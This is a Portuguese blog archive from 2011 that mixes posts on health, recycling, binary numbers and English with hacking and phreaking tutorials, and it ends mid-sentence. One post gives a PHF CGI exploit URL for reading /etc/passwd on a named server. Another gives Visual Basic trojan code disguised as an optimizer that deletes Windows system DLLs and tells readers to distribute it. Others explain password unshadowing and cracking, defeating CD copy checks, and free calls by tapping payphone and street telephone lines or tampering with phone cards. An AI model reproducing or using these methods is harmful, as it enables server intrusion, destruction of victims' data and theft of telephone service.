Simulador de defeitos
Uma ferramenta ideal para quem estar aprendendo montagem e manutenção de micros.
8 de ago. de 2011
4 de mai. de 2011
DOENÇA TUBERCULOSE
O que é tuberculose ?
Doença infecto-contagiosa causada pelo “bacilo de koch”, cujo nomecientífico é Mycobacterium tuberculosis.
A turbeculose pode ser trasmitida por meio das secreçoes respiratória. Doentes não tratados costumam eliminar grande quentidade de bactérias no ambiente, tossindo,falando ou espirando. Essas bactérias podem ser inspiradas por pessoas saudáves, levando ao adoencimento.
Qual o tratamento ?
A infecção por Tuberculose numa pessoa que não tem a doença não é considerada um caso de Tuberculose e normalmente é relatada como uma infecção latente de Tuberculose. Esta distinção é importante porque as opções de tratamento são diferentes para quem tem a infecção latente e para quem tem a doença ativa.
* Candidatos ao tratamento de tuberculose latente: são aqueles grupos de muito alto risco, com reação positiva à tuberculina de 5 mm ou mais.
* Tratamento de tuberculose ativa : incluem uma combinação de drogas, às vezes num total de quatro, que são reduzidas após certo tempo, a critério médico. Não se utiliza apenas uma droga, pois, neste caso, todas as bactérias sensíveis a ela morrem, e, três meses depois, o paciente sofrerá infecção de bactérias que conseguiram resistir a esta primeira droga. Alguns medicamentos matam a bactéria, outros agem contra a bactéria infiltrada em células, e outros, ainda, impedem a sua multiplicação.
* A TUBERCULOSE TEM CURA EM 100 % DOS CASOS, BASTA TOMAR OS MEDICAMENTO CORRETAMENTE DURANTE SEIS MESES, SEM INTERRUPÇÃO.
O que é reciclagem ?
Reciclar, é reaproveitar materiais orgânicos, que são aqueles de origem animal. E inorgânicos aqueles que não têm origem biológica.
Os alimentos, por exemplo, são considerados materiais orgânicos. As sobras destes alimentos como as cascas de legumes e frutas que vão para o lixo de cozinha pode ser transformado em adubo. Os adubos são fertilizantes utilizados na terra para enriquecer os solos das plantações.
Os materiais inorgânicos como: plásticas, latas de refrigerante, entre outros, também podem ser reciclados. Nestes casos, é muito comum que se reutilize o próprio material, ou seja, latas de refrigerante são processadas e transformadas em novas latas, assim como as garrafas de vidro também são preparadas de forma a serem reutilizadas.
Para colaborar no processo de reciclagem o lixo é separado em 4 latas diferentes: metal, papel, vidro e plástico.
A RECICLAGEM NO BRASIL
No Brasil produzem atualmente 240 mil toneladas de lixo por dia. A reciclagem na maioria das cidades do Brasil, e feita pelo sistema de coleta seletiva, geralmente è um serviço semanal de coleta de materiais previamente separados pela população.
A cidade brasileira que mais recicla lixo è Curitiba. Este processo contribui para formação de uma consciência ecológica e ainda aumenta a vida útil dos aterros sanitários, e valoriza a limpeza publica.
PROCESSO DE RECICLAGEM
Ao consumidor cabe separá-lo em casa e entregá-lo para a coleta seletiva da prefeitura ou às cooperativas de catadores. O material será recolhido, separado e vendido (ou doado, depende do caso) para indústrias de reciclagem que, por sua vez, executarão a reciclagem propriamente dita.
A RECICLAGEM TRAZ DIVERSOS BENEFICIOS TAIS COMO:
Contribui para diminuir a poluição do solo, água e ar.
Melhora a limpeza da cidade e a qualidade de vida da população.
Melhora a produção de compostos orgânicos.
Gera empregos para a população não qualificada.
Gera receita com a comercialização dos recicláveis.
30 de abr. de 2011
Imageshack armazenamento ilimitado de imagens GRÁTIS.
Como ganhar dinheiro com seu blog ou site !
Es aqui alguns links para programas de afiliados. Muito úteis .
- Google Adsense: Clássico dos clássicos. Disparado, o melhor. Antes, os pagamentos vinham via cheque, em nossas casas. Agora, chegam por transferência bancária (uma maravilha). Ganhamos quando os visitantes clicam nos anúncios do site e os valores variam. Há também os ganhos por referências (Picasa, Firefox, Adsense). Recomendo. Clique aqui !
- Mercadolivre: Ganhe de 30% a 55% das comissões por venda cobradas pelo MercadoLivre.
Receba de 25% a 40% das comissões por anúncios nos classificados de Carros, Imóveis e Serviços.
E entre R$ 5,00 e R$ 7,00 a cada Cadastro Ativo. Clique aqui !
- Hotwords: Assim como o Adsense, sua vantagem é que funciona de forma contextual, isto é, os anunciantes compram palavras e estas são grifadas e linkadas em nossos sites. Ganhamos R$ 0,08 por cada clique que geramos. São bem atenciosos no suporte. Clique aqui !
- Cyber Diet: Este site oferece planos de emagrecimento, e você é comissionado em R$ 6,00 + 12% do plano assinado. Não sei detalhes de seu funcionamento mas parece ser uma empresa séria. Clique aqui !
- Buscapé: Outro programa bem controverso. Alguns recomendam, outros não. Pagam R$ 0,10 por clique premium (aquele que o usuário faz alguma ação no site como procura, navega ou vai para alguma loja). Clique aqui !
- UOL Afiliados: Funciona mais ou menos como o Adsense do Google. Os valores dos cliques variam, por isso não tem preço definido da sua comissão. Novo ainda e ouvi dizer que tem poucos anunciantes, fazendo com que nem sempre sejam exibidos anúncios em seu site. Clique aqui !
- Catho: Um dos maiores (se não for o maior) site de busca de empregos do Brasil. Comissão de 90% sobre a assinatura de seus planos. Cliqui aqui !
- Jacotei:Similar ao Buscapé, onde paga pelas visitas geradas ao site do anunciante. R$ 0,15 por clique unico. Clique aqui !
- Manager: Similar ao do Catho: 90% de comissão nas assinaturas do site de emprego. Clique aqui !
- Submarino: Comissão de 2% à 8% sobre as vendas no site. São mais de 700 mil produtos para seu site ou blog. Clique aqui !
Se faltou algum relevante, comente. É claro que existem outros… listei os que acho que valem à pena.
29 de abr. de 2011
Como colocar contador de visitas no blogger
1º Passo entre no site http://www.contadorvisitas.com/pt/ na primeira pagina você já escolhe a cor do contador, click em gerar contador para meu site. Cópia o código HTML que sera gerado. Obs: Não modifique o código, para que ele não corra risco de não funcionar no futuro.
2º Abra o seu Blogger
3º Click em Adicionar um Gadget
4º Click em HTML/JavaScript
5º Escreva no título vistantes
6º Cole o código HTML que você copiou
E pronto!!! estar feito.
Os números binários são utilizados pelos computadores para processar dados. É um sistema de numeração que, em vez de utilizar 10 algarismos, utiliza apenas 2 (0 e 1).
Converte Decimal para Binário
A conversão do número inteiro, de decimal para binário, será feita da direita para a esquerda, isto é, determina-se primeiro o algarismos das unidades ( o que vai ser multiplicado por 20 ) , em seguida o segundo algarismo da direita ( o que vai ser multiplicado por 21 ) etc...
A questão chave, por incrível que pareça, é observar se o número é par ou ímpar. Em binário, o número par termina em 0 e o ímpar em 1. Assim determina-se o algarismo da direita, pela simples divisão do número por dois; se o resto for 0 (número par) o algarismo da direita é 0; se o resto for 1 (número ímpar) o algarismo da direita é 1.
Por outro lado, é bom lembrar que, na base dez, ao se dividir um número por dez, basta levar a vírgula para a esquerda. Na base dois, ao se dividir um número por dois, basta levar a vírgula para a esquerda. Assim, para se determinar o segundo algarismo, do número em binário, basta lembrar que ele é a parte inteira do número original dividido por dois, abandonado o resto.
Vamos converter 25 de decimal para binário.
Outro modo simples de fazer essa conversão é dividir o número decimal que você quer converter em binário por dois. (será 0 ou 1). Pegue o quociente dessa divisão e divida-o, também, por dois. Anote, outra vez o resto. Faça assim até que o quociente de sua divisão seja 1 (isto é, a divisão de 2 por 2).
O seu número em binário é 1+ todos os restos das divisões, do quociente menor para o maior. Assim:
Vamos transformar o número 39:
Note que o último resultado também será computado, logo o número começa com 1 e segue dos restos de baixo para cima, portanto:
Veja outro exemplo de transformação de um número de decimal para binário, e o inverso.
Pegamos o número 141:
Logo temos : 10001101
Para transformar um número binário em decimal, pegue cada digito de seu número separadamente, e conte sua posição (unidade, vale um, dezena, dois, centena, três, assim por diante). O número dessa posição será o expoente da potência de base dois que você tem. Assim:
Ataque a provedores via browser
O ataque via browser é um dos ataques mais fáceis de executar, mas não dá nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse metudo:
Primeiramente você tem que entender o que está fazendo, não adianta seleccionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:
Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados
(se você nao sabe ainda, dá um olhada na seção "SISTEMA UNIX"), existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuarios é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.
Ex:
http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode usar o anonymizer (Se você não ainda o que é o anonymizer, dá uma olhada na seção Anônimo), bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá.
Ataques por monitoração
Os ataques por monitoração são baseados em software de monitoração de rede conhecido como "sniffer", instalado surrepticiamente pelos invasores.
O sniffer grava os primeiros 128 bytes de cada sessão login, telnet e FTP session vista naquele segmento de rede local, comprometendo TODO o tráfego de/para qualquer máquina naquele segmento, bem como o tráfego que passar por aquele segmento. Os dados capturados incluem o nome do host destino, o username e a password. A informação é gravada num arquivo posteriormente recuperado pelo invasor para ter acesso a outras máquinas.
Em muitos casos os invasores obtem acesso inicial aos sistemas usando uma das seguintes técnicas:
Obtém o arquivo de passwords via FTP em sistemas impropriamente configurados.
Obtém o arquivo de password de sistemas rodando versões inseguras do NIS
Obtém acesso ao sistema de arquivos locais via pontos exportados para montagem com NFS, sem restrições. Usam um nome de login e password capturada por um sniffer rodando em outro sistema.
Uma vez no sistema, os invasores obtem privilegios de root explorando vulnerabilidades conhecidas, tal como rdist, Sun Sparc integer division, e arquivos utmp passíveis de escrita por todo mundo ou usando uma password de root capturada.
Eles então instalam o software sniffer, registrando a informação capturada num arquivo invisível. Adicionalemente, eles instalam Cavalos de Troia em substituição e uma ou mais dentre os seguintes arquivos do sistema, para ocultar sua presença:
/bin/login
/usr/etc/in.telnetd
/usr/kvm/ps
/usr/ucb/netstat
Cavalos de Tróia
1. Saiba o que são os cavalos de Tróia
Cavalos de Tróia são programas que vem escondidos dentro de outros sem que o usuário saiba de sua existência. Eles podem permitir que outra pessoa obtenha controle sobre a máquina de um internauta conectado à Internet.
Atualmente, o recursos tem sido amplamente utilizado para invadir máquinas conectadas à Internet. A tática é simples: mandar um programa qualquer (protetores de tela ou animações engraçadinhas, por exemplo), que na verdade contém inserido um outro que dá ao hacker acesso remoto à máquina onde o cavalo de Tróia foi instalado. Esses softwares são verdadeiras portas de acesso ao conteúdo do computador.
Os Cavalos de Tróia permitem que outra pessoa obtenha controle sobre a máquina do usuário, através do protocolo TCP/IP da Internet. Testes demonstraram que o administrador remoto é capaz de acessar dados e efetuar tarefas com mais eficiência do que o próprio usuário que está em frente à máquina.
2. Conheça os programas Back Orifice, Netbus, Sockets de Tróie e outros
Entre os principais troianos estão o Back Orifice (BO), que se instala em micros que rodam o Windows 95/98, o NetBus, capaz de rodar também no Windows NT, o Master's Paradise 98 e o Sockets de Troie (ST). Todos apresentam características semelhantes: permitem administração remota, revelam as senhas contidas no sistema operacional do usuário e mostram em tempo real tudo aquilo que é digitado.
3. Dicas para evitar a invasão de seu micro
- Proteja e troque a sua senha
O controle deve começar pela identidade digital do usuário. User e senha são identificações particulares que merecem o máximo cuidado e sigilo. Com certeza, ninguém gostaria de compartilhar a sua senha bancária ou o número do seu cartão de crédito com mais alguém. O mesmo deve acontecer com a sua senha de acesso.
A troca periódica da senha é um bom começo para quem não quer dar chance ao azar. A maioria dos provedores de acesso oferece esse serviço online. Para maior segurança, o usuário deve utilizar senhas relativamente complexas. No mínimo, utilize uma senha alfanumérica com 6 caracteres. Mantenha o hábito de conferir o extrato detalhado da utilização da sua conta de acesso. Ao notar qualquer alteração no número de horas utilizadas, entre em contato com administração do seu provedor.
Isso evita alguns problemas, mas não funciona se o seu computador já tiver um cavalo de Tróia instalado. Isso porque alguns desses programas permitem ao hacker roubar a sua senha do seu próprio micro. Nesse caso, é necessário desinstalar o troiano de sua máquina, antes de mais nada. Para saber se há algum cavalo de Tróia instalado em sua máquina, você precisa de um programa detector.
- Não execute programas de origem duvidosa
Antes de mais nada, para evitar que a sua máquina seja vítima de um ataque deste tipo, recomendamos que você pense duas vezes entes de rodar qualquer arquivo executável (qq_coisa.exe) encontrado na rede ou recebido por e-mail. Mesmo que você receba um executável de um conhecido ou amigo, procure saber antes a procedência do mesmo.
- Seja cauteloso com o IRC e ICQ
Muitos dos programas de IRC tem bugs conhecidos que permitem aos usuarios enviar executáveis para outros, em certas circunstâncias. Não aceite programas (jogos, screensavers etc.) recebidos via IRC porque não há como saber quem o está enviando, e também nunca se deve deixar o IRC aceitando automaticamente transmissões de arquivos ou executando scripts. As mesmas precauções valem para o ICQ. Não acredite em noticias recebidas ao acaso dizendo coisas como "use este programa para atualizar seu ICQ" ou "rode este patch para proteger seu Explorer" etc. Se receber algo assim, confira sempre as notícias no site do fabricante do software em questão.
- Atualize o seu navegador periodicamente
Além da troca de senha, o usuário precisa manter seus softwares sempre atualizados. Tanto o navegador da Netscape quanto o da Microsoft (Internet Explorer) já apresentaram bugs de segurança em quase todas as suas versões. Tão logo estes bugs são descobertos, as respectivas fabricantes oferecem patches de correção para os problemas. Visitas regulares ao site da fabricante do seu navegador preferido o ajudarão na coleta de informações sobre os bugs e suas respectivas correções.
4. Copie programas para se defender
Para evitar que a sua máquina seja vítima do ataque de um hacker utilize um Firewall,
Os Trojans, ou Cavalos-de-Tróia: são as coisas mais comuns hoje em dia na Internet. Não passam de programas que passam por algo extraordinário, mas na verdade são malignos. Ou seja, pode passar-se por um belo jogo e formatar teu HD. Aqui, eu vou ensinar a fazer uns Trojans. Mensalmente, espero, vou por um ou mais Trojans novos. Como 99% das pessoas usam Windows 95, vou colocar com o código para Visual Basic. Não é uma admiração pela Microsoft, muito pelo contrário, mas seria inútil programar em C para rodar em Windows.
Cavalo de Tróia 1
Para este Trojan, você vai utilizar apenas um botão, alguns labels e dependendo de você algumas figuras.
Este é um simples Trojan. Simplesmente deleta as DLL's do diretório System do Windows.
Faça uma tela convincente, dizendo que é um belo programa que otimiza a velocidade do micro, melhora o desempenho da conexão à Internet, sei lá... Qualquer coisa. Faça uma bela tela, se possível coloque uns logotipos qualquer para impressionar. Então ponha um botão, escrito "Continuar". No seu código coloque:
Evento - Click (Isso é o que aparece no lado superior direito da tela. Aquele dropdown)
kill "c:\windows\system\*.dll"
form2.show
Crie um novo formulário, simplesmente com a frase: "Aguarde enquanto o Setup copia os arquivos necessários para a instalação" Não mexa no nome dele, ou você terá que mudar a linha form2.show para .show.Aí, isso é importante, crie o setup do programa com o Setup Wizard. Assim ele copiará todas as DLL's necessárias para que o programa funcione. Com o setup feito, compacte em zip ou arj, e coloque em alguma BBS ou distribua. Quem pegar terá uma grande surpresa.
Descobrindo senhas
Se você está afim de pegar senhas para o seu uso, leia atentamente as instruções abaixo:
1. O jeito mais facil de pegar senhas, é fazendo o download do arquivo passwd, que fica no diretorio /etc do provedor. Neste arquivo, estão armazenado os logins, senhas cryptografadas e outros dados de todos os 'users' daquele provedor. Na maioria dos lugares o arquivo passwd contido no diretorio /etc, vem com um chamado shadow.
O que seria shadow?
Shadow, é quando o arquivo passwd nao vem com as senhas cryptografadas. Ele vem com um * no lugar da senha. Abaixo você tem um exemplo de um passwd com shadow.
kaneko:*:118:100:Take7:TaniKayoko:/home/students/makizono/s974076:/bin/csh
E com esse shadow, não da pra você descryptografar as senhas. Mais existe um jeito de tirar esse shadow! Basta voce usar o programa "unshad.c". Se o arquivo passwd estiver sem shadow, não será necessário a utilizacao desse programa.
Abaixo, um exemplo de um passwd sem shadow.
galvao:r2ln6GlgXEIVg:2201:2001:Geraldo P. Galvao:/home/galvao:/bin/csh
No exemplo mostrado, a senha cryptografada é "r2ln6GlgXEIVg"
2.Descryptografando as senhas
Bom, já falamos da parte de download do passwd agora, vamos falar de como se descryptografa as senhas. Para descryptografar as senhas, você precisara de um cracker (Programa usado para descryptografar senhas)
Ex.: CrackJack
3.Como usar o programa unshad.c
Usar o programa unshad.c, é muito fácil. Basta você fazer um upload dele pra sua shell, e quando ele ja estiver na shell, digite "cc -o unshad unshad.c" para compila-lo. Após a compilacao, basta digitar "./unshad" e as shells se abriram sem o shadow.
Se você usa o Windows 95 como sistema operacional, jogue ele fora e pegue o LINUX. Se você não usar o LINUX não será um verdadeiro Hacker.
Enganando programas
Sabe akeles programas ou jogos que precisam do CD para rodarem? Claro que sabe, porque eu perguntei. Aqui vou ensinar como fazer o programa acredi- tar que o CD estah no drive.Aqui vao algumas manhas:
1. Veja se existe um config.cfg em algum diretorio do jogo jah instalado no HD. Se existir abra-o e procure por uma linha tipo: CD-ROM DRIVE: D: Entao mudea para: CD-ROM DRIVE: C:\JOGOS\SIMCITY\
2. Copie a parte do CD que e' usada pelo jogo para o um diretorio do HD. Entao resete o computador sem carregar o MSCDEX para o DOS nao reconhecer a unidade de CD-ROM(ele estah no autoexec.bat e config.sys). Entao entre no DOS e digite: subst D: C:\JOGOS\SIMCITY\Essa dica soh funcionara' se o jogo for para DOS.
3. Depois de instalar o Jogo, rode um programa que particione o HD, assim a particao fica com o nome de D: e o jogo se confunde. Copie o conteudo do jogo do CD para essa particao.
4. Rode um editor hexadecimal no jogo e procure a palavra 'D:', altere tudo, inclusive os dirs para a unidade local(C:) e salve. Agora copie os diretorios que serao carregados pelo jogo, para o HD(na Raiz).
5. Rode um editor hexadecimal no jogo e procure pelo hexa 'CD 2F'(int 2F). Para quem nao sabe essa e' a interrupcao do CD. Esse meio é difício porque voce deve conhecer um pouco de assembly e um pouco dos codigos hexadecimais para alterar as instrucoes dessa instrução.
28 de abr. de 2011
INTRODUÇÃO
O inglês pertence ao grupo anglo-frisão, incluído no ramo ocidental das línguas germânicas que, por sua vez, é uma subfamília das línguas indo-europeias.
Há três etapas fundamentais em sua evolução: o inglês antigo ou anglo-saxão, que vai do ano 449 ao 1100; o inglês médio, até o ano 1500; e o moderno, com duas etapas: clássica, de 1500 a 1660, e contemporânea, de 1660 a nossos dias.
A ORIGEM DA LINGUA INGLESA E PAISES QUE FALAM ESSA LINGUA.
Origem da língua inglesa se inicia com os Celtas, povos que habitaram a Inglaterra por volta de 1.000 a.C. O povo Celta chegou a ser o principal grupo de línguas na Europa por, aproximadamente, oito séculos. Posteriormente sofreu influências de outras línguas ou grupos de línguas tais como:
Latim - em função das invasões romanas na Bretanha e do processo de evangelização do anglo sexões pelos missionários cristãos.
Dinamarquês - por parte dos Vikings.
Francês - língua dominante na Inglaterra pela classe aristocrática e pelos Anglo-Saxões em busca de ascensão social em função do domínio de franceses no reinado Inglês por 300 anos.
Alemão - É, a partir daqui que a história da língua inglesa foi dividida em três períodos: Old English, Middle English e Modern English.
PAISES QUE FALAM ESSA LINGUA.
O Inglês é a língua oficial ou uma língua predominante nos seguintes países e territórios:
Antigua and Barbuda
Australia
Bahamas
Barbados
Belize
Botswana
Canada
Fiji
Gambia
Ghana
Grenada
Guyana
India
Ireland
Eire
Jamaica
Kenya
Kiribati
Liberia
Malawi
Malta
Marshall Islands
Mauritius
Micronesia
Namibia
Pakistan
Palau
Panama
Papua New Guinea
Philippines
Rwanda
Saint Kitts and Nevis
Saint Lucia
Saint Vincent and the
Grenadines
Seychelles
Sierra Leone
Singapore
South Africa
Swaziland
Tanzania
Trinidad and Tobago
United Kingdom
United States
Vanuatu
Zambia
Zimbabwe
New Zealand
Nigeria
A INFLUÊNCIA DA LINGUA INGLESA NA LINGUA PORTUQUESA.
A influência da cultura norte-americana e o avanço da tecnologia mudaram isso, há uma avalancha de palavras novas, na língua portuguesa.
Hoje, no nosso dia a dia podemos reparar que cada vez mais usamos a linguagem inglesa, Como por exemplo: quando iremos ha uma lanchonete, e pedimos ao atendedor para fazer um hot dog, estamos usando uma palavra que vem do inglês que significa cachorro-quente. Existem milhares de palavras em inglês que usamos aqui no Brasil, tais como:
Offline
online
internet
catch-chup
shopping
playground
browser
driver
drag queen
hit
home theater
link
mouse
scanner
lap top
remix
site
marketing
Entre muitas outros.
Concluindo, podemos perceber que cada vez mais a sociedade estar usando palavra em inglês, e querendo conhece-la mais e mais, isso quer dizer, desenvolvimento.
Um ano depois de sair da Escola Poli¬técnica, em 1817, Comte tornou-se secretário de Saint-Simon (1760 - 1825), do qual receberia profunda influência.
• Apelo aos conservadores (1855)
• Síntese subjetiva (1856)
• Correspondência, em 8 volumes (1816-1857)
27 de abr. de 2011
TÉCNICAS PHREAKER
Bom vcs ja devem ter ouvido falar de pessoas que ligaram pelo botao
de desligar, ou de dar linha aquele onde vc poe o gancho por cima.
Porra se deve ter entendido.
Bom muito facil tbm, so nao dou certeza de que va funcionar porque o
telefone não pode ser muito novo...tem que ser um modelo um pouco mais
antigo, bom no meu que é um modelo de 89 funcionou se o seu é por ai
deve funcionar normalmente!
-.- DIRETO AO ASSUNTO -.-
1- Faca a ligacao com o numero desejado!
ex: 555-6766
- para discar o 5 ( aperte cinco vezes aquele botao )
5 ( aperte cinco vezes aquele botao )
5 ( aperte cinco vezes aquele botao )
6 ( aperte seis vezes aquele botao )
7 ( aperte sete vezes aquele botao)
6 ( aperte seis vezes aquele botao )
6 ( aperte seis vezes aquele botao )
Voce deve estar se perguntando, mas se tiver um zero como eu faco?
p:-Nao aperto nada?
Obx: Tem que ter um intervalo de 1 a 2 segundos entre os apertos!
Obx2: "aquele botao" é o botao do gancho, onde voce desliga!
-----Ligando de telefone publico sem pagar!
Este metodo so funciona em telefones antigos! Aqueles na base da fichinha
ou da moedinha ( se estiver nos Eua, usa o Rex Box ).
Por exemplo:
O numero que vc quer ligar e' 823-26-47 ( numero ficticio )
Primeiro vc deve dimunuir de 10 todos os numeros que compoem o telefone
a se ser discado, no caso esse telefone ficaria.
Numero a ser discado: 823-26-47
ORIGINAL_______
(8-10)=2
(2-10)=8
(3-10)=7
(2-10)=8
(6-10)=4
(4-10)=6
(7-10)=3
_______ NOVO NUMERO
O novo numero sera: 287-84-63
O que vc vai ter que fazer e' bater no bocal do telefone o numero de ve-
zes correspondente a subtracao.
Bata 2 vezes no bocal ( intervalo de 2 segundos )
Bata 8 vezes no bocal ( intervalo de 2 segundos )
Bata 7 vezes no bocal ( intervalo de 2 segundos )
Bata 8 vezes no bocal ( intervalo de 2 segundos )
Bata 4 vezes no bocal ( intervalo de 2 segundos )
Bata 6 vezes no bocal ( intervalo de 2 segundos )
Bata 3 vezes no bocal ( intervalo de 2 segundos )
Desta maneira vc podera fazer ligacoes gratuitamente...
Quando estiver agil podera ligar mais rapido, ai fica facil!
-----Ligando de telefone celular sem pagar
Bom, esse metodo foi observado por mim e foi confirmado por muitos
amigos. Mas de um tempo pra cá a CRT ou telemerda. Mudaram o sistema e
talvez nao funcionara, mas tente!!!!
Voce tem que ligar para um numero normal, vamos pegar o exemplo de um
numero de celular.
Ex: 928-13-47
Olha, nem sei se este numero existe e se existe nao conheco o dono do
numero, nao vao ligar pra ele e pedir informacoes! ;))
Entao devemos pegar o ultimo numero do telefone a ser discado, no caso
o 7... subtraimos ele de 10, o que vai resultar o numero 3.
Somente vamos acrescentar o numero 3 ao final do numero discado.
O resultado vai ficar:
Numero ligado sem pagar: 928-13-47-3
Heheheheh! Itz so eazy
Nao teste isso como um louco, faca um ou duas ligacoes que realmente
sejam significantes no valor e espera a conta telefonica.
Obs. Nao conte isso pra ninguem! heheheheh ;)
-----Phucking block line
Essa tecnica e' meio forcada, mas funciona.
Nosso alvo sao aqueles aparelho que bloqueiam chamadas telefonicas o
tao temido BLOCK LINE.
Bem isso e'soh uma parte pq ja estamos imaginando uma materia futura so-
bre o sistema mas o englobando de forma muito melhor e falando mais dos
detalhes tecnicos. Por enquanto espero isso quebre o galho...
Primeira coisa que vcs devem fazer e' descobrir se o problema e' realmen-
te o BLOCK LINE e se a linha nao foi bloqueada na companhia telefonica.
Antes de tudo olhe se a senha padrao que e' 222 nao foi mudada.
Agora procuro o telefone principal da casa, aquele que quando desligado
desliga a todos da casa.
Acho? Beleza, abra ele com uma chave de fenda e procure uma caixinha pre-
ta escrita block line.
Abra agora tb o block line, com cuidado pra nao quebrar. Apos ter feito
isso tire a pelicula que cobre a placa do aparelho block line e exponha
o circuito a luz fluorescente ( raios ultra-violeta). Pronto, vc apagou
todas informacoes da placa...
Agora e' claro que os pessoas nem vao desconfiar qual o problema ;)
-----Como ligar gratuitamente em orelhoes a cartao
Ponha o cartao e ligue normalmente
Quando a pessoa atender aperte o 0(zero) e segure.
Pronto agora suas fichas (unidades do cartao) nao vao cair mais!
Obx: Nao solte o dedo do 0(zero) se nao as fichas vao voltar a cair,
essa e a parte chata!
-----Algumas dicas pra fazer cartoes que realmente funcionam
Ok, os cartoes desse tipo de orelhao, funcionam da seguinte forma:
Eles sao formados por minusculos microfusiveis queimados por indutancia,
assim, quando vc insere o cartao no orelhao, atraves de um "sensor", ele
verefica quantos microfusiveis ainda estao "ligados". Quando vc conhece
algo, vc pode engana-lo, entao, um metodo q tem funcionado por quase to-
do brasil, eh o de vc pegar o seu cartao, e fuça-lo todo.
As dicas que funcionam:
Esmalte:
Pegar um cartao telefonico comum e passar um esmalte incolor ( base ) na
tarja do cartao. Parece que esta base impede o cartao de "queimar" os
creditos, o mesmo pode ser tentado em cartao de fliperama.
Pinte a tarja de maneira que fique fina para impedir que o cartao fique
grosso demais e nao passe na maquina.
Papel Aluminio
E' soh pegar um pedaco de papel aluminio e enrolar no cartao, pode usar a
vontade...
Silicone
Este é o metodo mas facil e comprovado por mim. pegue aquela silicone
(transparente) e passa bem fina (fina mesmo) camada de silicone por cima e
deixa secar mais tarde vc vera um cartão que funciona infinitivamente
-----Efetuando ligacoens gratuitas de um telefone publico utilizando um diodo
O diodo e um componente eletronico que possui diversas utilizaçoens.
Podemos resumir seu funcionamento basicamente na seguinte sintese:
Um diodo (ou jun‡aum PN), permite que a corrente circule em apenas uma
direçaum dentro de um circuito.
Ao se utiliza-lo para o fim aqui desejado, vamos precisar de um diodo
IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente em
qualquer casa de componentes eletronicos. Vamos precisar tambem de um
resistor com valor nominal de 22K e potência de 1W.
Maums a obra !
Basta que voce ligue o diodo em paralelo com o resistor (conforme tenta
mostrar a ilustraçaum abaixo) e em seguida, descasque os fios do telefone
e ligue cada uma das pontas obtidas com o diodo e o resistor neles.
Lembre-se: voce vai apenas descascar os fios do orelhaum !!! Se voce corta-los, ele vai ficar sem linha.
Para executar esta tarefa, eu aconselho que voce descasque os fios dos
orelhoens que voce utiliza com mais frequencia pois, devido ao fato dos
fios do telefone publico serem muito grossos, naum e um trabalho que se
possa fazer tranquilo e rapidamente sem ser notado. Voce dever observar
tambem a polarizaçaum correta a ser utilizada. Voce pode perceber isso
facilmente pois, quando voce ligar o diodo de maneira errada, o orelhaum
vai ficar sem linha.
Uma dica pessoal: os telefones de cabine e os de caraum saum mais
faceis de serem violados. Alguns orelhoens comuns tem uma proteçaum
blindada que impedem o acesso ao cabo telefonico. Embora mesmo assim
seja possível puxar o fio com um gancho, que voce deve enfiar do lado
esquerdo do aparelho telefonico, entre o telefone e uma grade preta de
sustentaçaum que fica atras dele, eu aconselho que voce evite esses
tipos.
Vamos voltar um pouco para a parte tecnica da coisa.
O diodo que estamos utilizando vai funcionar da seguinte maneira:
Quando uma ligaçaum e completada de um telefone publico, a central
inverte a polarizaçaum do telefone de -48 para 48 volts. Quando o
aparelho telefonico percebe isso, ele pede uma fixa (ou uma unidade).
Ai e que entra em funcionamento o nosso querido diodo.
Ele permite que a tensaum caia ate 0 volts, mas naum permite que ela se
torne positiva. Dessa forma o orelhaum não vai pedir a ficha (ou unidade
de cartão).
Nesse caso o resistor esta funcionando apenas como um dissipador de
potencia, para que voce naum de o azar de queimar o diodo (naum que ele
seja karo, e que em algumas localidades ele pode ser uma peça rara que
custa R$0,15) e ficar sem telefonar. Mesmo se voce naum achar nenhuma
loja que venda, pegue uma placa antiga de alguma coisa que tenha
queimado.
Elas sempre tem diodos. Voce deve procurar uma peça pequinininha que
tem dois terminais, e preta e normalmente vai estar escrito IN.
=======Efetuando ligaçoes com seu pequeno telefone em um orelhão
Essa técnica foi muito usada aqui na minha city por mim e por amigos.
Vc deve de madrugada (de preferencia) chegar no orelhào e colocar a mao
la tras, vc vera que tem um fio duplo soh. com muito cuidado puxeo para o
lado e descasque os dois fios!! pronto agora é soh chegar ali e conectar seu
pequeno telefone aos fios do orelhão e pronto. Vc tem uma linha que vc so
pode ligar pra DEI, DEI, DEI (DDD) porque orelhão tem bloqueio de ligação
internacional.
Dica: compre um telefone em lojas de consertos eleronicos bem pequenos e
antigos que tem um formato de um celular.
Dica2: o que so pode fazer é conectar um notebook e navegar normalmente com
uma conta de um lammer.
-----Efetuando ligaçoes dos tampoes do meio da rua
Naum sei se vc ja notou, aquelas tampas que existe no meio da rua. Escrito tipo"
telefone" na minha city ta cheio. Um dia (de preferencia de madrugada)
levanta aquilo, pedi pra alguem ajuda porque é pesado.
Vc vai ver um fio se ele tiver descascado Otimo!! tira a isolante e usa. Mas se ele
nao tiver descascado vc vai ter que fazer isso. Agora pega o seu fone e conecta naquele fio vc
vai pode fazer ligaçao (ddd, ddi, pra onde tu quiser)
Dica: Quando vc fechar a tampa deixa a parte do fio que vc descascou pra fora aí a outra
vez que vc ir lá vc nao precisa levantar mais.
-----Efetuando ligaçoens gratuitas de caixas de verificaçaum (caixas da CRT OU TELEMERDA):
Para se efetuar uma ligaçaum de dentro destas caixas, basta que voce
pegue um dos diversos pares de fios que se encontram la dentro e ligue
eles ao seu pequeno telefone comum portatil ou a um notebook. Naum
esqueça de por os fios que voce tirou de volta no lugar para que, nem o
pessoal da manutençaum e nem o dono da linha, percebam. Como essas
caixas de verificaçaun costumam se situar em vias bem movimentadas, a
